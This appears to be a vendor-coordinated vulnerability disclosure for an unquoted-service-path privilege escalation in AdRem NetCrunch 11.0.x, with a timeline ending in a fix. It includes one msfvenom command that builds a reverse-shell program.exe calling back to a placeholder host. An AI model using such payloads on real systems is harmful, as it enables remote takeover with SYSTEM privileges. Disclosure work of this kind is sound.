Local privilege escalation in AdRem NetCrunch NCServer.exe and NCMonitoringEngine.exe

NetCrunch is a network monitoring solution by Adrem, it runs on a central server and probes the network for information. A local privilege escalation was found in the server software in the services NCServer.exe and NCMonitoringEngine.exe. When one of the services starts it appears that an unquoted path tries to execute c:\program and c:\program.exe. If the file is found it will be executed every few seconds with system privileges.

This was tested on NetCrunch versions: 11.0.5.5351 and 11.0.6.5359

Version 11.0.6.5359:

Version 11.0.5.5351 (NetCrunch is installed on the d drive):

After program.exe is found its executed every second:

Placing a malicious file results in a shell with system privileges:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe

Time Line:

  • 12/03/2021: Initial disclosure to vendor
  • 12/03/2021: Additional questions from vendor
  • 16/03/3021: Vendor acknowledged vulnerability
  • 22/04/2021: A fix as been deployed (RK0013)